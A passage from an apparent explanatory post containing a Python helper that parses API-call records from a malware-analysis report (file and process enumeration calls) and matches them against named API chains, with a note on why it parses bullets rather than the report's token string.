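                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def matched_chains(calls: list[ApiCall]) -> list[str]:
    """Names of the chains whose APIs all appear in the record."""
    present = {c.base for c in calls}
    return sorted(name for name, needed in CHAINS.items() if needed <= present)


def direct_call_sites(calls: list[ApiCall]) -> list[int]:
    """Call-site addresses of the record's own (non-subcall) calls."""
    return sorted(c.ref for c in calls if c.subcall is None)


# FILES_RECORD copies the bullets of the lstrcat/FindFirstFileA record on this page.
FILES_RECORD = """\
APIs
  • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
• lstrcat.KERNEL32(?,00000000), ref: 004D51CA
• lstrcat.KERNEL32(?,004E1058), ref: 004D51E7
• lstrcat.KERNEL32(?,012A8F78), ref: 004D51FB
• lstrcat.KERNEL32(?,004E105C), ref: 004D520D
  • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4B7C
  • Part of subcall function 004D4B60: FindFirstFileA.KERNEL32(?,?), ref: 004D4B93
  • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC4), ref: 004D4BC1
  • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC8), ref: 004D4BD7
  • Part of subcall function 004D4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004D4DCD
  • Part of subcall function 004D4B60: FindClose.KERNEL32(000000FF), ref: 004D4DE2
"""

# PROCS_RECORD is constructed to match the "lstrcpy$Process32$...Toolhelp32" API ID
# of the first record on this page; the addresses and arguments are made up.
PROCS_RECORD = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401000
• Process32First.KERNEL32(?,?), ref: 00401010
• lstrcpy.KERNEL32(?,?), ref: 00401020
• Process32Next.KERNEL32(?,?), ref: 00401030
• CloseHandle.KERNEL32(?), ref: 00401040
"""

if __name__ == "__main__":
    for name, rec in (("files", FILES_RECORD), ("procs", PROCS_RECORD)):
        calls = parse_record(rec)
        print(name, len(calls), "calls", matched_chains(calls),
              [hex(a) for a in direct_call_sites(calls)])
```

The chain table deliberately keys on base names rather than the report's "API ID" token string, which is a frequency-ordered word split (for example "lstrcat$Find$File$CloseFirstFolderNextPathwsprintf") that cannot be reliably mapped back to full API names; parsing the individual bullets keeps the module, the call site and the subcall boundary, which the token string discards.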